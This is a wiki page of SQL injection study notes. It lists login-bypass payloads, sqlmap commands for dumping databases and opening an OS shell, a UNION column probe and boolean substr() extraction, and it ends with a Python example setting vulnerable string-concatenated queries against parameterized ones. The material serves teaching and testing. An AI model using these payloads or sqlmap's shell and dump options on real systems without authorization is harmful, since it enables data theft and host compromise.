SQL Injection General Notes

TheGetch edited this page May 14, 2021 · 1 revision

Testing for Bypasses:

' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -

SQLMAP

sqlmap crawl

sqlmap -u http://172.21.0.0 --crawl=1

sqlmap dump database

sqlmap -u http://172.21.0.0 --dbms=mysql --dump

sqlmap shell

sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell

SQLi

Testing for the number of columns a UNION needs (add or remove numbers until the page renders without error):

http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8

Boolean Based SQLi

substr() (alias substring()) returns a substring of the given argument. It takes three parameters: the input string, the 1-based starting position of the substring, and its length. Each probe below is a true/false comparison, which is why this is called boolean based.

  • or substr(user(), 1, 1) = 'a -> if true, move on to the next letter:
  • or substr(user(), 2, 1) = 'b

Continue until the username is revealed.
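As an added illustration (not part of the original notes), the following Python/sqlite3 snippet models the string-concatenated query behind a page like inj.php next to its parameterized replacement, and shows why the `' or 1=1 --` and `substr()` probes above change the result set only against the concatenated form. The table, column names and rows are constructed for the example; sqlite3 is used in place of MySQL, so `user()` is replaced by a column probe.

```python
import sqlite3

# Constructed in-memory table standing in for whatever inj.php?id= looks up.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE items (id INTEGER, name TEXT, owner TEXT)")
conn.executemany(
    "INSERT INTO items VALUES (?, ?, ?)",
    [(1, "widget", "alice"), (2, "gadget", "bob")],
)


def lookup_concat(user_input: str) -> list:
    """Vulnerable pattern: the request value is pasted into the SQL text,
    so quotes, OR clauses and -- comments in it are parsed as SQL."""
    sql = f"SELECT name FROM items WHERE owner = '{user_input}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(user_input: str) -> list:
    """Fixed pattern: a bound parameter. The value is handed to the engine
    separately from the statement and is never parsed as SQL."""
    sql = "SELECT name FROM items WHERE owner = ?"
    return [row[0] for row in conn.execute(sql, (user_input,))]


def compare(payload: str) -> dict:
    """Run the same payload through both forms so the difference is visible."""
    return {"concat": lookup_concat(payload), "param": lookup_param(payload)}


if __name__ == "__main__":
    # Comment-based bypass from the list above: concatenated query returns
    # every row, parameterized query matches nothing.
    print(compare("' or 1=1 --"))
    # Boolean-based probe: the true/false outcome leaks one character of a
    # column value, but only through the concatenated query.
    print(compare("' or substr(owner, 1, 1) = 'a"))
    print(compare("' or substr(owner, 1, 1) = 'z"))
```

Logging a request whose parameter contains a quote followed by `or`, `--` or `#` is a cheap detection signal for exactly these probes; the parameterized form is the fix.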